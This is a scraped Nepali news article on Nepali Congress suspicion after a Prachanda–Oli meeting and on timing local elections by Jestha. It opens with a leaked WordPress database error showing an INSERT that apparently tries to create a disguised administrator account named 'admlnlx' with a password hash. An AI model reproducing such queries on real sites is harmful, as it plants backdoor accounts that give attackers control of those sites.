WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Be7iJ8CrVM9fCjjakQ4vqrl1Uu2CHM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 17:19:35', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन १–
संविधान संशोधनमा सहमति नजुट्ने र चुनावको मिति पनि घोषणा हुन नसकेका बेला प्रधानमन्त्री प्रचण्ड र एमाले अध्यक्ष केपी शर्मा ओलीबीच भएको भेटले कांग्रेस झन सशंकित बनेको छ। ‘भेटमा ओली जीले नीति तथा कार्यक्रम पनि ल्याउनुस र बजेट पनि ल्याउनुस भन्नु भएपछि आंशका उब्जिएको छ,’ देउवा निकट स्रोत भन्छ, ‘चुनाव घोषणा नहुने र सरकार पनि नछोडने अवस्थामा सशंकित हुनु अस्भाविक होइन।’ आजको नयाँ पत्रिका दैनिकमा खबर छ।
दलहरुवीच जेठभित्र स्थानीय निर्वाचन गर्नेबारे छलफल भइरहेको छ। जेठसम्मा निर्वाचन भएमा दलहरुको सहमति अनुसार देउवा प्रधानमन्त्री बन्ने बाटो खुल्ने छ। तर त्यतिबेलासम्ममा पनि निर्वाचन नभएमा अर्कै गठबन्धन बन्नसक्ने सम्भावना रहने भन्दै सशंकित भएको हो।